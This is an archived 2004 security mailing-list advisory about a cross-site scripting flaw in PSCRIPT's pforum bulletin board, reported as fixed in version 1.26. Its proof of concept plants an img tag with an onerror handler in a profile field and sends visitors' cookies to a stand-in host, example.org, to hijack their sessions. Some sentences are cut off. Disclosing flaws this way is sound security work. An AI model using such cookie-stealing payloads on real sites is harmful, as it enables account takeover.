mailing list archives
pscript.de PFORUM XSS Vulnerability
From: Christoph Jeschke <ponders.bugtraq () arcor de>
Date: Sun, 15 Aug 2004 01:34:59 +0200 (CEST)
Product Powie's PSCRIPT Forum
Version All versions before 1.26
OS All with PHP and mySQL.
Vendor URL www.pscript.de
Vendor Status informed
Security Risk Lvl high
Remote Exploit yes
pforum is a BBS, similar to phpBB or other. The author provides
users possibility to enrich their profiles with personal data. Although
the author tries to eliminate malicious code (like unwanted html code)
in the inputs, two of the fields are not handled secure. Therefore it's
possible to steal cookies or do other nasty things.
If you login into your account, pforum saves your user id, your password
and the PHP session id. If somebody redirects you, for example using
URL. Then he can easily using your PHP session id for hijacking your
pforum session. If he creates or modifies two cookies with the user id
or the crypted password, he can easily hijack your account only by visiting
Proof of Concept
case example.org). The file contains the following code:
Edit your profile and enter the following line into the the IRC Server or AIM
ID Input Box. The string have to be shorter then 100 characters.
// Input Box (without line break)
<img height=0 width=0 src=foo onerror=b(); >
Post a lot. Because the picture can't be found and the onError Event Handler
redirected to http://example.org/compute_stolen_data.ext. All cookie values
will be appended to the URL.
Critical. You can get administrator or moderator of the forum.
The Vendor reacted quickly and fixed the vulnerability satisfactorily in a new
version of the pforum (1.26).
- pscript.de PFORUM XSS Vulnerability Christoph Jeschke (Aug 16)